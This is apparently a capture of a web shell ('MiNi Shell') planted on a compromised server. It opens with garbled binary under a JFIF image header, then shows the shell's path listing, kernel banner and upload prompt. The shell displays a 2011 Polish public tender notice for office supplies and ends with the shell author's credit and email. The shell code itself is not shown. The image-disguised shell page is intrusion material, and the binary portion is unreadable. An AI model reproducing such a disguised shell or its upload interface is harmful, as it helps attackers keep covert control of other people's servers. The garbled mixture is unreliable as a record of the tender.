JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111125/308831-N-2011.html

<p class="kh_header"><b>Łódź: ZP/89/2011 Artykuły biurowe i piśmienne dla Instytutu CZMP</b><br>
<b>Numer ogłoszenia: 308831 - 2011; data zamieszczenia: 25.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut "Centrum Zdrowia Matki Polki" - Samodzielna Sekcja Zamówień Publicznych , ul. Rzgowska 281/289, 93-338 Łódź, woj. łódzkie, tel. 42 2711188, 2711069, faks 42 2711187.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iczmp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/89/2011 Artykuły biurowe i piśmienne dla Instytutu CZMP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET 1 - Papier utajniony i składanki komputerowe<br/>		
1.Papier utajniony - 3 składnikowy z perforacją, w kształcie kopert 210 x 12/6(1+2)	36 000	szt<br/>								
2. Składanka komputerowa 240 x 12 (1+2)	24 op<br/>								
3. Składanka komputerowa 240 x 12 (1+3)	40 op<br/>									
4.Składanka Komputerowa 250x12(1+0)	3 op<br/>								
5.Składanka Komputerowa 390x12 (1+0)	3 op<br/>									
6.Składanka Komputerowa 390x12 (1+1)	4 op<br/>									
7.Składanka Komputerowa 390x12 (1+2)	3op<br/>									
PAKIET 2 - Torby papierowe z atestem do kontaktu z żywnością	<br/>
1.Torba papierowa, biała, krzyżowa 0,25 kg	10 kg	<br/>								
PAKIET 3 - Papier ksero<br/>												
1.Papier ksero format A-4; gramatura 80g/m2 /1 ryza - 500 arkuszy/ 	3 600	ryz	<br/>					
2.Papier ksero format A-4; gramatura 80g/m2, kolor /1 ryza - 500 arkuszy/ 	6	ryz<br/>						
3.Papier ksero format A-3; gramatura 80g/m2 /1 ryza - 500 arkuszy/ 	100	ryz<br/>						
4.Papier ksero format A-5; gramatura 80g/m2 /1 ryza - 500 arkuszy/ 720	ryz<br/>						
PAKIET 4 - Rolki do faksu i kas<br/>									
1.Rolki fax 216 x 30	80szt<br/>						
2.Rolki fax 210 x 30	110szt	<br/>					
3.Rolki kasowe 57x25	80szt<br/>						
PAKIET 5 - Etykiety uniwersalne do drukarek <br/> 									
1.Etykiety uniwersalne do drukarek 88,9 x 35,7; jednorzędowe /op.-1 000 szt./ 	2	op<br/>						
2.Etykiety samoprzylepne na arkuszu A-4 70 x 42,3 /op.-100 szt./	1	op.<br/>						
3.Etykiety samoprzylepne na arkuszu A-4 105 mm x 37 mm /op. - 100 szt./	1	op<br/>						
								
PAKIET 6 - Koperty białe<br/>									
1.Koperty białe C-6 samoprzylepne 	12 000	szt<br/>						
2.Koperty białe C-5 samoprzylepne	12 000	szt<br/>						
3.Koperty białe C-4 samoprzylepne	20 000	szt<br/>						
4.Koperty białe B-5 samoprzylepne	24 000	szt<br/>						
5.Koperty białe B-4 samoprzylepne	6 000	szt<br/>					
6.Koperty białe DL samoprzylepne z okienkiem /prawym i lewym wg. zapotrzebowania	2 000	szt<br/>						
7.Koperty białe DL samoprzylepne 	1 000	szt<br/>						
PAKIET 7- Blok makulatorowy, zeszyty, papier podaniowy, kostki klejone, skorowidz<br/>									
1.Blok makulaturowy A-4 - 96 kart. (kratka)	300	szt<br/>					
2.Blok makulaturowy A-5 - 96 kart (kratka)	200	szt<br/>						
3.Zeszyt A-5 16 kartkowy szyty (kratka)	100	szt<br/>						
4.Zeszyt A-5 32 kartkowy szyty (kratka)	250	szt<br/>						
5.Zeszyt A-5 60 kartkowy szyty (kratka)	400	szt<br/>						
6.Zeszyt A-5 96 kartkowy szyty, sztywna okładka (kratka)	300	szt<br/>						
7.Zeszyt A-4 96 kartkowy szyty, sztywna okładka (kratka)	400	szt<br/>						
8.Zeszyt A-4 192 kartkowy szyty, sztywna okładka (kratka)	100	szt<br/>						
9.Papier pakowy szary 125 cm x 100 cm	20	kg<br/>						
10.Kostki klejone 92 x 77 x 60  /1op.-500 kartek klejonych/	20	op<br/>						
11.Bloczki samoprzylepne 75 x 75  /1bl. - 100 kartek/	20	bl<br/>						
12.Skorowidz A-4	5szt<br/>					
13.Skorowidz 1/2 A-4	5szt<br/>			
PAKIET 8 - Długopisy, mazaki, markery, foliopis, cienkopisy, ołówki, rysiki, wkłady do długopisów i cienkopisów, zakreślacze <br/>									
1.Długopis typu Zenith	50szt	<br/>					
2.Długopis na przylepce - leżące	3szt<br/>						
3.Mazaki wodoodporne czarne z końcówką stożkową - pernamentne, spirytusowe	1 200	szt<br/>					
4.Markery zdobnicze, olejowe do pisania na metalu, szkle, plastiku i gumie - grubość pisania 0,8 - 1,2 mm /kolor: czarny, biały, srebny, złoty/	30szt<br/>						
5.Cienkopis permanentny, wodoodporny do pisania na szkle  o grub. 0,4mm, czarny.	50	szt	<br/>					
6.Marker wodoodporny szybkoschnący nadający sie na metal, szkło, plastik, folia standardowe 0,4 mm	30szt<br/>						
7.Marker wodoodporny szybkoschnący nadający się na metal,szkło,plastik, folia cienkopiszący 0,2 mm	30	szt<br/>					
8.Foliopis - do pisania na płytach CD	100	szt<br/>				
9.Mazaki zwykłe /kolory wg. zamówienia/	150	szt	<br/>				
10.Cienkopis żelowy z wkładem wymiennym 0,5	100	szt<br/>					
11.Ołówki HB z gumką	600	szt<br/>					
12.Ołówek automatyczny 0,5 HB	5	szt<br/>					
13.Rysiki - grafity do ołówków automatycznych 0,5 HB	5op<br/>					
14.Wkład typu Zenith   /kolory wg. zamówienia/	600szt	<br/>				
15.Wkład zwykły /kolory wg. zamówienia/	600szt<br/>					
16.Wkłady do posiadanych przez Zamawiajacego  piór kulkowych Parker  /Roller Ball/  rozmiar 0,5mm	6szt<br/>					
17.Wkłady do cienkopisów żelowych 0,5 (kolory wg zamówienia	100szt	<br/>				
18.Zakreślacze /kolory wg. zamówienia/	50szt	<br/>				
PAKIET 9 - Korektory<br/>								
1.Korektor w płynie z gąbką 20 ml	100	szt<br/>					
PAKIET 10 - Poduszki i tusz do stempli, tusz do numeratora, wkład do numeratora automatycznego, maczałka.	<br/>								
1.Poduszka do stempli duża   /160 mm x 90 mm/	20szt	<br/>					
2.Poduszka do stempli samotuszująca mała /90 mm x 50 mm/	20szt	<br/>					
3.Tusz do stempli 50ml automat /kolory wg. zamówienia/	180szt	<br/>					
4.Tusz do numeratora /kolory wg. zamówienia/	4szt<br/>						
5.Wkład do  posiadanego przez Zamawiającego numeratora automatycznego /REINER B6K/	2szt	<br/>					
6.Maczałka	5szt	<br/>					
PAKIET 11 - Pinezki, spinacze metalowe<br/>									
1.Pinezki /op.-100 szt./	5	op	<br/>					
2.Spinacze metalowe duże /op.-100 szt./	200	op						<br/>
3.Spinacze metalowe trójkątne małe /op.-100 szt./	1 200	op<br/>						
PAKIET 12 - Temperówki, nożyczki, gumki, linijki, klej biurowy<br/>									
1.Temperówka	50	szt<br/>						
2.Nożyczki 19 cm	20	szt<br/>						
3.Gumka	150	szt	<br/>					
4.Linijka 30 cm	50	szt<br/>						
5.Linijka 50 cm	10	szt<br/>						
6.Klej biurowy w płynie 40 ml	300	szt	<br/>				
PAKIET 13 - Dziurkacze, zszywacze, zszywki	<br/>								
1.Dziurkacz	30	szt	<br/>					
2.Dziurkacz duży, żeliwny	5szt<br/>						
3.Zszywacz	100	szt	<br/>					
4.Zszywacz mini	20	szt	<br/>					
5.Zszywki 24/6 	1 200	op						<br/>
6.Zszywki mini No 10	150	op<br/>						
PAKIET 14 - Datownik automatyczny, numerator automatyczny	<br/>								
1.Datownik automatyczny	40szt	<br/>					
PAKIET 15 - Kalka maszynowa, taśmy różne 	<br/>																
1.Kalka maszynowa A-4 -czarna /op.-100 szt./	5op	<br/>													
2Taśma /13 mm x 10 m/ czarna	10szt	<br/>													
3Taśma /13 mm x 6m/ czerwono-czarna	20szt	<br/>													
4Taśma do posiadanych przez Zamawiającego  metkownic Tovel i Biltz  C-20 /2 wierszowa/	2 000szt	<br/>													
5Taśma klejąca przezroczysta 18mm/20m	500szt	<br/>													
6Taśma klejąca przezroczysta 25mm/20m	20szt	<br/>													
7Taśma pakowa plastikowa  szer. 48 mm x 66 m 	200szt<br/>	
PAKIET 16 - Koszulki foliowe, segregatory, skoroszyty, teczki<br/>																	
1.Koszulki foliowe A-4 /op.-100 szt./ przezroczyste z grzbietem do wpinania	350	op									<br/>				
2.Koszulki folioweA5 /op.100szt./  przezroczyste z grzbietem do wpinania	100op<br/>														
3.Segregator A-4 - szeroki, pokryty PCV	500szt	<br/>													
4.Segregator A-4 - wąski, pokryty PCV	300szt	<br/>													
5.Segregator A-5 - szeroki, pokryty PCV	200	szt<br/>														
6.Skoroszyt plastikowy z przezroczystą okładką z grzbietem do wpinania	2 000	szt									<br/>				
7.Teczka tekturowa A-4 biała - bigowany grzbiet, wiązana	40 000	szt<br/>						
8.Teczka do podpisu harmonijkowa  	30	szt	<br/>					
9.Teczka plastikowa A-4, wiązana	800	szt<br/>		
PAKIET 17- Tuby na rysunki	<br/>								
1.Tuby na rysunki regulowane z PP, kolor niebieski, format A-3-A-1, od 35-62 cm 	30	szt	<br/>					
PAKIET 18 - Koperty z rozszerzonym dnem	<br/>								
1.Koperty na dokumenty A-4 z rozszerzonym dnem i bokami  	100	szt<br/>.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawijający nie wymaga wniesienia  wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca przewiduje wykonanie zamówienia z udziałem podwykonawców Zamawiający żąda dołączenia do oferty wypełnionego oświadczenia z wykazem zakresu części zamówienia zlecanych podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art.144 ust. 1 PZP Zamawiający przewiduje możliwość dokonania zmiany w zawartej umowie w następujących sytuacjach:
1.zmiany stawki podatku VAT
2.w przypadku niewykorzystania części asortymentu możliwa jest zmiana terminu realizacji zamówienia przedłużenie okresu obowiązywania umowy 
3.zmiany sposobu konfekcjonowania a co za tym idzie liczby opakowań. W wyniku niniejszych zmian Zamawiający przewiduje możliwość zmiany ceny jednostkowej opakowania, która zostanie wyliczona z proporcji.
4.zmiany organizacyjnej Instytutu CZMPistotnej dla realizacji niniejszej umowy;
5.zmiany organizacji  pracy Instytutu CZMP istotnej dla realizacji niniejszej umowy
6.zmiany formy prawnej prowadzonej działalności gospodarczej ;
7.zmiany adresu siedziby firmy oraz  zmianie adresu zamieszkania właściciela lub współwłaściciela firmy;
w przypadku gdy zmiana jest korzystna dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iczmp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Centrum Zdrowia Matki Polki  93-338 Łódź ul.Rzgowska 281/289 Samodzielna Sekcja Zamówień Publicznych pawilon A (Ginekologiczno- Położniczy) poziom 0 pok. nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2011 godzina 10:00, miejsce: Instytut Centrum Zdrowia Matki Polki  93-338 Łódź ul.Rzgowska 281/289 Samodzielna Sekcja Zamówień Publicznych pawilon A (Ginekologiczno- Położniczy) poziom 0 pok. nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com